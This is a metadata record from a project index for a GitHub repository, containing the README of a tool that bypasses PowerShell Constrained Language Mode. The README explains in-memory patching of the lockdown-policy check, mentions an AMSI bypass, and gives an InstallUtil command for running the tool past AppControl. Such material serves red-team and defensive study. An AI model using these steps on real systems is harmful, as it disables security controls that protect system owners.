{"id":13841114,"url":"https://github.com/calebstewart/bypass-clm","last_synced_at":"2025-04-13T06:37:04.539Z","repository":{"id":41416364,"uuid":"334040278","full_name":"calebstewart/bypass-clm","owner":"calebstewart","description":"PowerShell Constrained Language Mode Bypass","archived":false,"fork":false,"pushed_at":"2021-01-31T19:13:55.000Z","size":12,"stargazers_count":259,"open_issues_count":1,"forks_count":37,"subscribers_count":7,"default_branch":"master","last_synced_at":"2025-03-26T23:06:14.211Z","etag":null,"topics":["bypass","powershell","windows"],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/calebstewart.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-01-29T04:46:23.000Z","updated_at":"2025-03-14T15:37:15.000Z","dependencies_parsed_at":"2022-09-19T13:40:39.823Z","dependency_job_id":null,"html_url":"https://github.com/calebstewart/bypass-clm","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/calebstewart%2Fbypass-clm","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/calebstewart%2Fbypass-clm/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/calebstewart%2Fbypass-clm/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/calebstewart%2Fbypass-clm/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/calebstewart","download_url":"https://codeload.github.com/calebstewart/bypass-clm/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248675334,"owners_count":21143763,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass","powershell","windows"],"created_at":"2024-08-04T17:01:02.858Z","updated_at":"2025-04-13T06:37:04.519Z","avatar_url":"https://github.com/calebstewart.png","language":"C#","funding_links":[],"categories":["C# #"],"sub_categories":[],"readme":"# PowerShell Constrained Language Mode Bypass\n\nThis will build an executable which executes a Full Language Mode powershell session even when Constrained Language Mode is enabled. At the time of writing, the only bypass methods I have found are downgrading to PowerShell version 2 or using Runspaces from .Net. PowerShell version 2 is not commonly available now, and Runspaces do not natively provide an interactive interface. This method will provide a full powershell session just like running `powershell.exe`, but will *always* be in Full Language Mode.\n\nThis is accomplished by doing the following:\n\n1. We reflectively load the internal `SystemPolicy` class within `System.Management.Automation`\n2. We ensure the static method `GetSystemLockdownPolicy` has been compiled by the JIT engine.\n3. We retrieve a function pointer for the compiled method.\n4. We utilize VirtualProtect to ensure the function code is writable.\n5. We overwrite the method with the stub `xor rax,rax; ret`. This effectively forces `GetSystemLockdownPolicy` to return `SystemEnforcementMode.None`.\n6. We utilize the `Microsoft.PowerShell.ConsoleShell` module to load an interactive PowerShell session within this process.\n\nWe also implement a method similar to the `rasta-mouse` AMSI Bypass to ensure the new shell is not scanned by AMSI.\n\nIt's worth noting that this will not spawn `powershell.exe`. The PowerShell prompt and interpreter are run from memory in the current process.\n\n## Executing a FLM Shell under AppControl\n\nIf `AppControl` is enabled, you can use the well known `InstallUtil` method. This project supports being loaded by `InstallUtil`. Simply place the binary in a safe directory (`C:\\Windows\\Tasks\\` is a common safe directory) and run the following:\n\n```batch\nREM find `InstallUtil`\ndir \\Windows\\Microsoft.NET\\* /s/b | findstr InstallUtil.exe$\nREM Run the FLM powershell session\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U \"C:\\Windows\\Tasks\\bypass-clm.exe\"\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcalebstewart%2Fbypass-clm","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcalebstewart%2Fbypass-clm","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcalebstewart%2Fbypass-clm/lists"}